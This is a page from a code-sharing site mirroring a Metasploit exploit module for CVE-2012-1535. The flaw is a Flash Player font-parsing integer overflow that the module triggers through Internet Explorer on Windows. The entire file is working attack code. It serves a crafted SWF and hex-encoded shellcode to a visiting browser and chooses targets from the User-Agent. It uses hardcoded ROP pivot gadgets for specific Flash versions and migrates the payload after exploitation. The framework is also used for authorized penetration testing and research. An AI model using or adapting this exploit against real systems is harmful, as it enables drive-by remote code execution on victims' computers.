CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_otf_font.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11


12
  def initialize(info={})

13
    super(update_info(info,

14
      'Name'           => "Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",

15
      'Description'    => %q{

16
          This module exploits a vulnerability found in the ActiveX component of Adobe

17
        Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file

18
        with a large nTables value in the 'kern' header, it is possible to trigger an

19
        integer overflow, which results in remote code execution under the context of the

20
        user.  This vulnerability has also been exploited in the wild in limited targeted

21
        attacks.  Please note in order to ensure reliability, the exploit is forced to

22
        modify your URIPATH parameter to less than 3 characters, which may cause possible

23
        URIPATH collisions.

24
      },

25
      'License'        => MSF_LICENSE,

26
      'Author'         =>

27
        [

28
          'Alexander Gavrun', #Through iDefense

29
          'sinn3r',

30
          'juan vazquez'

31
        ],

32
      'References'     =>

33
        [

34
          [ 'CVE', '2012-1535' ],

35
          [ 'OSVDB', '84607'],

36
          [ 'BID', '55009'],

37
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/' ],

38
          [ 'URL', 'https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html' ],

39
          [ 'URL', 'http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html' ],

40
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit' ],

41
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-18.html']

42
        ],

43
      'Payload'        =>

44
        {

45
          'Space' => 1024

46
        },

47
      'DefaultOptions'  =>

48
        {

49
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

50
        },

51
      'Platform'       => 'win',

52
      'Targets'        =>

53
        [

54
          # Tested successfully on:

55
          # Flash 11.2.202.233

56
          # Flash 11.3.300.268

57
          # Flash 11.3.300.265

58
          # Flash 11.3.300.257

59
          [ 'Automatic', {} ],

60
          [ 'IE 6 on Windows XP SP3',    {'Rop' => nil } ],

61
          [ 'IE 7 on Windows XP SP3',    {'Rop' => nil } ],

62
          [ 'IE 8 on Windows XP SP3',    {'Rop' => true, 'ASLR' => false } ],

63
          [ 'IE 7 on Windows Vista SP2', {'Rop' => nil }],

64
          [ 'IE 8 on Windows 7 SP1',     {'Rop' => true, 'ASLR' => true } ],

65
          [ 'IE 9 on Windows 7 SP1',     {'Rop' => true, 'ASLR'   => true } ]

66
        ],

67
      'Privileged'     => false,

68
      'DisclosureDate' => '2012-08-09',

69
      'DefaultTarget'  => 0))

70


71
    register_options(

72
      [

73
        OptEnum.new('ROP', [true, "The ROP chain to use", 'SWF', %w(SWF JRE)]),

74
      ])

75
  end

76


77
  def get_payload(t, flash_version=nil)

78
    if t['Rop'].nil?

79
      p = [

80
        0x0c0c0c0c, # mapped at 1e0d0000

81
        0x0c0c0c0c,

82
        0x0c0c0c0c, # mapped at 1e0d0008

83
      ].pack("V*")

84


85
      p << payload.encoded

86
      return p

87
    end

88


89
    if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/

90
      print_status("Using Rop Chain For Flash: #{flash_version}")

91
      pivot = [

92
        0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)

93
        0x0c0c0c0c,

94
        0x1001d891, # xchg eax, esp # ret (1e0d0008)

95
      ].pack("V*")

96


97
      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})

98


99
    elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/

100
      print_status("Using Rop Chain For Flash: #{flash_version}")

101
      pivot = [

102
        0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)

103
        0x0c0c0c0c,

104
        0x1001d6d3, # xchg eax, esp # ret (1e0d0008)

105
      ].pack("V*")

106


107
      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})

108


109
    elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/

110
      print_status("Using Rop Chain For Flash: #{flash_version}")

111
      pivot = [

112
        0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)

113
        0x0c0c0c0c,

114
        0x1001d755, # xchg eax, esp # ret (1e0d0008)

115
      ].pack("V*")

116


117
      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})

118


119
    else

120
      print_status("Default back to JRE ROP")

121
      pivot = [

122
        0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)

123
        0x0c0c0c0c,

124
        0x7c348b05, # xchg eax, esp # ret (1e0d0008)

125
      ].pack("V*")

126


127
      p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})

128
    end

129


130
    return p

131
  end

132


133
  def get_target(agent)

134
    #If the user is already specified by the user, we'll just use that

135
    return target if target.name != 'Automatic'

136


137
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/

138
      return targets[1]  #IE 6 on Windows XP SP3

139
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/

140
      return targets[2]  #IE 7 on Windows XP SP3

141
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/

142
      return targets[3]  #IE 8 on Windows XP SP3

143
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/

144
      return targets[4]  #IE 7 on Windows Vista SP2

145
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/

146
      return targets[5]  #IE 8 on Windows 7 SP1

147
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/

148
      return targets[6]  #IE 9 on Windows 7 SP1

149
    else

150
      return nil

151
    end

152
  end

153


154
  def on_request_uri(cli, request)

155
    agent = request.headers['User-Agent']

156
    my_target = get_target(agent)

157


158
    # Avoid the attack if the victim doesn't have the same setup we're targeting

159
    if my_target.nil?

160
      print_error("Browser not supported: #{agent}")

161
      send_not_found(cli)

162
      return

163
    end

164


165
    print_status("Target selected: #{my_target.name}")

166
    print_status("Client requesting: #{request.uri}")

167


168
    # The SWF request itself

169
    if request.uri =~ /\.swf$/

170
      print_status("Sending SWF")

171
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})

172
      return

173
    end

174


175
    # The TXT payload request

176
    if request.uri =~ /\.txt$/

177
      flash_version = request.headers['x-flash-version']

178
      shellcode = get_payload(my_target, flash_version).unpack('H*')[0]

179
      print_status("Sending Payload")

180
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })

181
      return

182
    end

183


184
    #swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"

185
    swf_uri = "/#{@resource_name}.txt.swf"

186


187
    html = %Q|

188
    <html>

189
    <head>

190
    </head>

191
    <body>

192
    <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">

193
    <param name="movie" value="#{swf_uri}">

194
    <param name="FlashVars" value="s=#{@resource_name}">

195
    </object>

196
    </body>

197
    </html>

198
    |

199


200
    html = html.gsub(/^ {4}/, '')

201


202
    print_status("Sending HTML")

203
    send_response(cli, html, {'Content-Type'=>'text/html'})

204
  end

205


206
  def primer

207
    # we need to handle direct /pay.txt requests

208
    hardcoded_uripath("/#{@resource_name}.txt")

209
  end

210


211
  def exploit

212
    @swf = create_swf

213
    @resource_name = Rex::Text.rand_text_alpha(5)

214
    vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")

215


216
    datastore['URIPATH'] = datastore['URIPATH'] || random_uri

217
    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//

218
    datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3

219
    print_warning("URIPATH set to #{datastore['URIPATH']}")

220


221
    super

222
  end

223


224
  def create_swf

225
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2012-1535", "Main.swf" )

226
    fd = ::File.open( path, "rb" )

227
    swf = fd.read(fd.stat.size)

228
    fd.close

229
    return swf

230
  end

231
end

232


233